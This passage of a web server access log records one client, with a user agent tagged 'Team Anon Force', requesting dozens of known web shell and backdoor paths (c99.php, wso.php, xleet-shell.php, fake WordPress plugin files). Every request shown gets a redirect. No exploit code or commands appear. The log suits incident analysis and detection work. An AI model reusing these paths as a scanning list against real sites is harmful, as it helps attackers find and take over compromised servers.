"Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:11 -0400] "GET /demo328/fw.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:18 -0400] "GET /gif.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:23 -0400] "GET /goods.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:31 -0400] "GET /images/sym.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:38 -0400] "GET /lab.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:44 -0400] "GET /leaf_mailer.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:50 -0400] "GET /leaf_php.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:58 -0400] "GET /libraries/joomla/jmail.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:15:08 -0400] "GET /libraries/joomla/jmails.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:15:19 -0400] "GET /mailer1.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:15:31 -0400] "GET /ms.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:15:50 -0400] "GET /rxr.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:16:04 -0400] "GET /srx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:16:15 -0400] "GET /tuco.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:16:28 -0400] "GET /unix.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:16:59 -0400] "GET /uploads/up.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:17:29 -0400] "GET /wp-admin/css/colors/coffee/fw.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:17:44 -0400] "GET /wp-admin/css/fw.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:17:49 -0400] "GET /wp-admin/includes/fw.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:17:54 -0400] "GET /wp-admin/maint/fw.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:01 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:09 -0400] "GET /wp-content/plugins/vwcleanerplugin/bump.php HTTP/1.1" 301 278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:15 -0400] "GET /wp-content/plugins/xichang/x.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:22 -0400] "GET /wp-content/plugins/zedd/1.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:26 -0400] "GET /wp-content/up.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:31 -0400] "GET /wp-content/wp.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:36 -0400] "GET /wp-mna.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:42 -0400] "GET /uploads/upload.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:48 -0400] "GET /wpx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:53 -0400] "GET /images/c99.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:18:58 -0400] "GET /xhell.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 69.171.249.1 - - [12/Aug/2025:07:18:58 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:07:19:04 -0400] "GET /xmrlpc.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:13 -0400] "GET /xz.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:19 -0400] "GET /yuuki.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:23 -0400] "GET /wp-content/plugins/upspy/index.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:27 -0400] "GET /wp-content/plugins/ubh/index.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:31 -0400] "GET /wp-content/plugins/vwcleanerplugin/bump.php?cache HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:35 -0400] "GET /wp-content/themes/gaukingo/db.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:39 -0400] "GET /wp-content/plugins/three-column-screen-layout/db.php HTTP/1.1" 301 287 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:44 -0400] "GET /wp-content/plugins/xichang/x.php?xi HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:49 -0400] "GET /wp-content/plugins/html404/index.html HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:54 -0400] "GET /wp-content/plugins/wp-db-ajax-made/wp-ajax.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:19:58 -0400] "GET /wp-admin/shapes.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:03 -0400] "GET /XxX.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:12 -0400] "GET /Marvins.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:19 -0400] "GET /wp-includes/css/modules.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:25 -0400] "GET /olux.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 52.23.225.234 - - [12/Aug/2025:07:20:32 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:07:20:32 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:37 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:42 -0400] "GET /wp-content/plugins/css-ready-sel/file.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:47 -0400] "GET /wp-content/plugins/css-ready/file.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:20:57 -0400] "GET /wp-content/think.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:04 -0400] "GET /wp-content/plugins/upspy/con.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:09 -0400] "GET /wp-content/plugins/upspy/up.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:19 -0400] "GET /wp-content/plugins/upspy/sllolx.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:24 -0400] "GET /database.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:28 -0400] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 301 288 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:32 -0400] "GET /shell20211028.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:37 -0400] "GET /wp-blog.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:41 -0400] "GET /repeater.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:44 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:49 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:54 -0400] "GET /xleet.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:21:59 -0400] "GET /1.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:22:07 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:22:13 -0400] "GET /2.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:22:30 -0400] "GET /wp-seo.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:22:49 -0400] "GET /wp-content/admin.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:23:04 -0400] "GET /wb.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:23:13 -0400] "GET /xxc.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:23:25 -0400] "GET /xl2023.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:23:32 -0400] "GET /x.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:23:51 -0400] "GET /wp-admin/network/network.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:24:08 -0400] "GET /xl.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:24:17 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:24:25 -0400] "GET /lufix.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:24:36 -0400] "GET /wp-admin/network/ HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:24:48 -0400] "GET /wp-activate.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:24:59 -0400] "GET /wp-admin/css/wp-login.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:25:10 -0400] "GET /images/iR7SzrsOUEP.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:25:21 -0400] "GET /cgi-bin/wp-login.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:25:36 -0400] "GET /iR7SzrsOUEP.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 209.38.125.40 - - [12/Aug/2025:07:25:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:07:25:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:07:25:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:07:25:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:07:25:46 -0400] "GET /admin-heade.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 